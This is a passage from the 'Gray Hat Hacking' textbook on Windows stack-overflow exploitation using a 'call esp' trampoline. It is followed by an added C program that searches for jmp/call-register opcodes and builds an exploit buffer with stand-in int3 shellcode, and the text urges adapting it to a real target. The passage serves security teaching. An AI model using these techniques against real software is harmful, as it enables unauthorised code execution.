Page 481

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

You will often find a portion, if not all, of your buffer in one of the registers when a Windows program crashes. As seen in the last section, we control the area of the stack where the program crashes. All we need to do is place our shellcode beginning at byte 54 and overwrite eip at bytes 50 through 53 with the address of a "jmp esp" or "call esp" opcode. We chose this attack vector because, at the moment the overwritten return address is popped, esp points just past it, at byte 54 where our shellcode starts, and either of those opcodes loads the value of esp into eip, so execution continues in our shellcode.

To find the address of such an opcode in our binary, we remember that ntdll.dll is dynamically loaded into our program at runtime. We can look inside that DLL, and others if necessary, by searching the Metasploit opcode database at
http://metasploit.com/users/opcode/msfopcode.cgi?wizard=opcode&step=1
We will choose the first one: "call esp" at 0x77f510b0. Remember that for later.

NOTE This attack vector will not always work. You will have to look at the registers and work with what you've got. For example, you may have to "jmp eax" or "jmp esi" instead, depending on which register holds your buffer.

Before crafting the exploit sandwich, we should determine the amount of buffer space available in which to place our shellcode. The easiest way to do this is to throw lots of As at the program and manually inspect the stack after the program crashes.
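The following C program is an added example, not code from the book, that ties the steps above together: it locates a "jmp reg" or "call reg" trampoline by scanning a module image for the two-byte opcode (the offline equivalent of the Metasploit opcode database lookup), then assembles the exploit sandwich with the book's layout (filler up to byte 50, the trampoline address at bytes 50 through 53 in little-endian order, shellcode from byte 54) and refuses to build it if the shellcode exceeds the space measured with the A flood. The module bytes and the int3 shellcode are constructed stand-ins; the only real values are the book's offsets and the address 0x77f510b0.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* x86 encodes "jmp r32" as FF /4 (ModRM E0+reg) and "call r32" as
   FF /2 (ModRM D0+reg). Register numbers: eax=0 ecx=1 edx=2 ebx=3
   esp=4 ebp=5 esi=6 edi=7. So jmp esp = FF E4, call esp = FF D4. */
enum { REG_EAX = 0, REG_ESP = 4, REG_ESI = 6 };

#define EIP_OFFSET       50   /* bytes 50..53 overwrite the saved eip (from the text) */
#define SHELLCODE_OFFSET 54   /* shellcode starts at byte 54 (from the text) */

/* Constructed stand-in for a slice of a loaded DLL: two nops, "call esp",
   a nop, then "jmp esp". Base chosen so "call esp" lands at 0x77f510b0. */
static const uint8_t sample_image[] = { 0x90, 0x90, 0xFF, 0xD4, 0x90, 0xFF, 0xE4 };
#define SAMPLE_BASE 0x77f510aeu

/* Constructed stand-in shellcode: four int3 breakpoints. */
static const uint8_t sample_shellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Return the virtual address of the first "jmp reg" (want_call == 0) or
   "call reg" (want_call != 0) found in image[0..len), or 0 if none. */
uint32_t find_trampoline(const uint8_t *image, size_t len, uint32_t base,
                         int reg, int want_call)
{
    uint8_t modrm = (uint8_t)((want_call ? 0xD0 : 0xE0) | (reg & 7));
    for (size_t i = 0; i + 1 < len; i++) {
        if (image[i] == 0xFF && image[i + 1] == modrm)
            return base + (uint32_t)i;
    }
    return 0;
}

/* Build the exploit sandwich into out. max_space is the usable buffer
   length measured with the A flood; returns the total length written,
   or 0 if there is no trampoline or the shellcode does not fit. */
size_t build_sandwich(uint8_t *out, size_t max_space, uint32_t trampoline,
                      const uint8_t *shellcode, size_t sc_len)
{
    size_t total = SHELLCODE_OFFSET + sc_len;
    if (trampoline == 0 || total > max_space)
        return 0;
    memset(out, 'A', EIP_OFFSET);            /* filler up to the saved eip */
    /* x86 is little-endian: 0x77f510b0 must be stored as b0 10 f5 77 */
    out[EIP_OFFSET + 0] = (uint8_t)(trampoline & 0xFF);
    out[EIP_OFFSET + 1] = (uint8_t)((trampoline >> 8) & 0xFF);
    out[EIP_OFFSET + 2] = (uint8_t)((trampoline >> 16) & 0xFF);
    out[EIP_OFFSET + 3] = (uint8_t)((trampoline >> 24) & 0xFF);
    memcpy(out + SHELLCODE_OFFSET, shellcode, sc_len); /* byte 54 onward */
    return total;
}

int main(void)
{
    static uint8_t buf[512];
    uint32_t tramp = find_trampoline(sample_image, sizeof sample_image,
                                     SAMPLE_BASE, REG_ESP, 1);
    size_t n = build_sandwich(buf, sizeof buf, tramp,
                              sample_shellcode, sizeof sample_shellcode);
    printf("call esp at 0x%08x, sandwich is %zu bytes\n", tramp, n);
    for (size_t i = EIP_OFFSET; i < n; i++)
        printf("%02x ", buf[i]);
    printf("\n");
    return 0;
}
```

The trampoline address is tied to the exact ntdll.dll build the book used; look it up for the target you are actually attacking, and if the crash leaves your buffer in eax or esi rather than esp, pass REG_EAX or REG_ESI to find_trampoline with want_call set to 0 to search for the matching "jmp" instead.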

